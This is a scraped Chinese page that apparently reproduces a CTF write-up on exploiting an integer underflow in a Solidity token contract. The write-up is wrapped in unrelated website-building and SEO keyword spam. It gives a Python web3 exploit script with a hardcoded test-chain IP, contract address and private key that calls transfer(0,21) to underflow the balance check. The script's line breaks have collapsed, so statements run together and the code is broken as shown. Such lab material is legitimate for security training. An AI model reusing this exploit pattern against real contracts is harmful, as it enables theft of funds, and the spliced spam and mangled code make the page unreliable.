当前位置: 首页 > news >正文

个人网站制作价格表晋城网站seo

个人网站制作价格表,晋城网站seo,鸿蒙os用什么语言开发app,自助下单网站区块链安全 文章目录 区块链安全整数溢出漏洞实战实验目的实验环境实验工具实验原理攻击过程分析合约源代码漏洞EXP利用 整数溢出漏洞实战 实验目的 学会使用python3的web3模块 学会以太坊整数溢出漏洞分析及利用 实验环境 Ubuntu18.04操作机 实验工具 python3 实验原理…

区块链安全

`

文章目录

  • 区块链安全
  • 整数溢出漏洞实战
    • 实验目的
    • 实验环境
    • 实验工具
    • 实验原理
    • 攻击过程
    • 分析合约源代码漏洞
    • EXP利用


整数溢出漏洞实战

实验目的

学会使用python3的web3模块
学会以太坊整数溢出漏洞分析及利用

实验环境

Ubuntu18.04操作机

实验工具

python3

实验原理

低版本Solidity整数是uint无符号类型,若操作存在不安全行为,可能会产生溢出,通过分析代码找到漏洞点,实现整数溢出利用。
题目环境是测试链,所以需要本地与题目进行交互,可使用python3中的web3模块,通过web3模块的rpc功能与题目交互,从而编写自动化利用脚本。
实验内容
使用python3编写脚本测试漏洞
找到整数溢出漏洞并形成利用获取flag
实验地址为nc ip 10001

攻击过程

nc 靶标ip 端口
在这里插入图片描述
打开http://ip,输入上述分配的game account,点击Request获取eth

在这里插入图片描述
在这里插入图片描述

nc ip 10001连接到题目,输入2,获取部署合约的地址及new token
在这里插入图片描述

nc ip 10001连接到题目,输入4,获取合约源代码,或者在题目附件找到合约源代码
在这里插入图片描述

分析合约源代码漏洞

题目要求把flag设置为true,分析合约代码,在transfer中可以将flag设置为true,但需要满足totalSupply - _value > 0,其中totalSupply=20,其实考点为Solidity智能合约整数溢出,totalSupply与value都是uint无符号整数,所以只需要value为21即可产生整数下溢,造成溢出
在这里插入图片描述
需要调用transfer(0,21)即可将flag设置为true

EXP利用

利用python3的web3模块与远程题目交互,并编写利用代码,将ip替换成题目的ip,contract_address替换成自己的地址

from web3 import Web3, HTTPProvider
import timew3 = Web3(Web3.HTTPProvider('http://192.168.2.102:8545'))contract_address = "0x68A04806e380BAa6D6f2E96027Cc0ed11c17FEf1"
private = "92b562f4dcb430f547401f31b5d1074e6791ec37786f449497c4f9563abef3fb"
public = "0x75e65F3C1BB334ab927168Bd49F5C44fbB4D480f"def generate_tx(chainID, to, data, value):txn = {'chainId': chainID,'from': Web3.toChecksumAddress(public),'to': to,'gasPrice': w3.eth.gasPrice,'gas': 3000000,'nonce': w3.eth.getTransactionCount(Web3.toChecksumAddress(public)),'value': Web3.toWei(value, 'ether'),'data': data,}return txndef sign_and_send(txn):signed_txn = w3.eth.account.signTransaction(txn, private)txn_hash = w3.eth.sendRawTransaction(signed_txn.rawTransaction).hex()txn_receipt = w3.eth.waitForTransactionReceipt(txn_hash)print("txn_hash=", txn_hash)return txn_receipt# transfer(0,21)
data = Web3.keccak(text='transfer(address,uint256)').hex()[:10]
data += '0'*64
data += '21'.rjust(64,'0')txn = generate_tx(8888, Web3.toChecksumAddress(contract_address), data, 0)
Hack = sign_and_send(txn)
print(Hack)

运行exp
在这里插入图片描述

在这里插入图片描述

nc ip 10001连接到题目,输入3,输入之前的new token,获取flag

在这里插入图片描述

http://www.hengruixuexiao.com/news/34400.html

相关文章:

  • 做app网站有哪些上海今天发生的重大新闻
  • 嘉兴做网站优化公司全国各大新闻网站投稿
  • 做平台的网站做网站推广公司
  • 湖南网站设计站长工具忘忧草
  • 广州模板网站建设谷歌seo是指什么意思
  • 做旅游网站选什么空间重庆放心seo整站优化
  • 有没有做英语题的网站百度搜一下
  • 网络营销产品策略泰安网站推广优化
  • 医疗类网站营销策略分析论文
  • 苏州网站维护常见的搜索引擎有哪些
  • 做代购 需要独立网站百度手机助手下载安卓
  • 襄阳网站建设制作费用站内推广的方法
  • 杭州网站建设费用多少直播营销的优势有哪些
  • 瓷器网站怎么做培训心得体会
  • 做网站什么好seo诊断站长
  • 成都建设项目环境影响登记网站百度seo软件曝光行者seo
  • 在万网申请的域名_需要把万网的账户密码给做网站的吗免费网站软件
  • 用户个人中心页面html源码广东网站营销seo方案
  • 网站排名优化外包公司广告平台有哪些
  • 前端如何做响应式网站自己如何做网站
  • 怎样增加网站流量怎么找拉新推广平台
  • 成全视频免费观看在线看ww自己搜20条优化措施
  • 免费手机网站建设百度贴吧入口
  • 做软装设计能用到的网站有哪些信息流广告代运营
  • asp做的网站数据库在哪里天津seo招聘
  • 重庆网站制作套餐公众号代运营
  • 做标签网站是干嘛的网站建设开发价格
  • 石景山网站制作案例东莞企业网站排名优化
  • 阳西哪里有做网站如何做好一个网站
  • 上海松江做网站建设怎么样做一个自己的网站